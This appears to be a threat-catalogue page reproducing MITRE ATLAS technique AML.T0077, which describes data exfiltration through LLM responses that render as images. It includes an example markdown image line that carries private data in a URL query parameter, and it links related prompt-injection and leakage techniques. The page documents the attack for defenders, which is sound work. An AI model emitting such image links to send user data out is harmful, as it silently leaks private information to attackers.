TechniqueexfiltrationATLAS

AML.T0077LLM Response Rendering

What it is

An adversary may get a large language model (LLM) to respond with private information that is hidden from the user when the response is rendered by the user's client. The private information is then exfiltrated. This can take the form of rendered images, which automatically make a request to an adversary controlled server. The adversary gets AI to present an image to the user, which is rendered by the user's client application with no user clicks required. The image is hosted on an attacker-controlled website, allowing the adversary to exfiltrate data through image request parameters. Variants include HTML tags and markdown For example, an LLM may produce the following markdown: ``` ![ATLAS](https://atlas.mitre.org/image.png?secrets="private data") ``` Which is rendered by the client as: ``` <img src="https://atlas.mitre.org/image.png?secrets="private data"> ``` When the request is received by the adversary's server hosting the requested image, they receive the contents of the `secrets` query parameter.

References

  1. https://atlas.mitre.org/techniques/AML.T0077

Related by meaning· 6

Nearest entities by semantic similarity across the cs-graph corpus.

ATLAS
LLM Prompt Obfuscation
ATLAS
LLM Trusted Output Components Manipulation
ATLAS
LLM Data Leakage
ATLAS
LLM Prompt Crafting
ATLAS
Exfiltration via AI Agent Tool Invocation
ATLAS
LLM Prompt Injection
Sourced from MITRE ATLAS — Adversarial Threat Landscape for AI Systems. Curated by Adam Lundqvist, SQUR.